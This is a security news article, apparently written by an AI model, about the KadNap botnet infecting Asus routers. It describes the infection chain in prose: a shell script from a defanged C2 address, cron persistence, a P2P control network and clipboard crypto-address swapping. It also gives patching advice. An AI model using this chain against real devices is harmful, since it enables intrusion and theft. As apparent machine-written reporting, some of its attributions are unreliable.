Ethical Hacking News
A new malware known as KadNap has infected over 14,000 edge devices worldwide, primarily targeting Asus routers to enlist them into a botnet for proxying malicious traffic. The malware employs stealth techniques and uses a peer-to-peer system to evade detection. Users are advised to keep their devices up to date and secure management interfaces to prevent potential infections.
The KadNap malware has infected over 14,000 edge devices worldwide, primarily targeting Asus routers. The malware uses a custom Kademlia Distributed Hash Table (DHT) protocol to evade traditional network monitoring techniques. The malware can monetize victims by hijacking cryptocurrency wallet addresses copied in X11 sessions and replacing them with attacker-controlled addresses. The KadNap botnet stands out for its use of a peer-to-peer network for decentralized control, making it difficult to detect and protect against. Users running SOHO routers are advised to keep their devices up to date, reboot regularly, change default passwords, secure management interfaces, and replace end-of-life models.
The cybersecurity landscape has been rattled by the emergence of a new malware known as KadNap, which has managed to infect over 14,000 edge devices worldwide. The malicious software, first detected in August 2025, has been identified as primarily targeting Asus routers and is designed to enlist them into a botnet for proxying malicious traffic. This article delves into the details of the KadNap malware, its mechanisms, and the implications it poses to network security.
The KadNap malware employs a custom version of the Kademlia Distributed Hash Table (DHT) protocol to conceal the IP address of its infrastructure within a peer-to-peer system. This approach allows the malware to evade traditional network monitoring techniques, making it challenging for cybersecurity researchers to track its activities. According to Black Lotus Labs, a leading cybersecurity company, "KadNap employs stealth techniques, such as process masquerading and Wayland session avoidance." These techniques enable the malware to maintain low visibility while simultaneously monitoring the clipboard every 200 milliseconds and substituting cryptocurrency addresses with attacker-controlled wallets.
The malware's decision to avoid execution in Wayland sessions is deliberate, as the display server protocol's security architecture places additional controls, like requiring explicit user interaction, before applications can access the clipboard content. In disabling itself under such scenarios, the malware aims to eliminate noise and avoid runtime failure. This approach highlights the KadNap malware's resourcefulness and adaptability in evading detection.
One notable feature of the KadNap malware is its ability to monetize victims directly by hijacking cryptocurrency wallet addresses copied in X11 sessions and replacing them with attacker-controlled addresses. The company behind the malware, Doppelgänger ("doppelganger[.]shop"), claims to offer resident proxies in over 50 countries that provide "100% anonymity." This service is said to have launched in May/June 2025.
The KadNap botnet stands out among others that support anonymous proxies in its use of a peer-to-peer network for decentralized control. The intention behind this approach is clear: avoid detection and make it difficult for defenders to protect against. According to Lumen, the company responsible for analyzing the malware, "their intention is clear, avoid detection and make it difficult for defenders to protect against."
The KadNap malware has been found to deploy itself across an assorted set of edge networking devices beyond Asus routers. Central to the attack is a shell script ("aic.sh") that's downloaded from the C2 server ("212.104.141[.]140"), which initiates the process of conscripting the victim into the P2P network. The file creates a cron job to retrieve the shell script from the server at the 55-minute mark of every hour, rename it to ".asusrouter," and run it.
Once persistence is established, the script pulls a malicious ELF file, renames it to "kad," and executes it. This leads to the deployment of KadNap. The malware is capable of targeting devices running both ARM and MIPS processors. It also connects to an NTP server to fetch the current time and store it along with the host uptime, creating a hash that serves as a basis for locating other peers in the decentralized network.
The files – fwr.sh and /tmp/.sose – contain functionality to close port 22, the standard TCP port for Secure Shell (SSH), on the infected device and extract a list of C2 IP address:port combinations to connect to. This allows the malware to establish robust communication channels that are difficult to disrupt.
Further analysis has determined that not all compromised devices communicate with every C2 server, indicating the infrastructure is being categorized based on device type and models. The Black Lotus Labs team told The Hacker News that Doppelgänger's bots are being abused by threat actors in the wild. "One issue there has been since these Asus (and other devices) are also sometimes co-infected with other malware, it is tricky to say who exactly is responsible for a specific malicious activity," the company said.
Users running SOHO routers are advised to keep their devices up to date, reboot them regularly, change default passwords, secure management interfaces, and replace models that are end-of-life and are no longer supported. The KadNap malware serves as a stark reminder of the importance of maintaining robust network security measures in today's threat landscape.
Related Information:
https://www.ethicalhackingnews.com/articles/KadNap-Malware-A-Stealthy-Proxy-Botnet-Infecting-14000-Edge-Devices-ehn.shtml
Published: Tue Mar 10 14:16:56 2026 by llama3.2 3B Q4_K_M
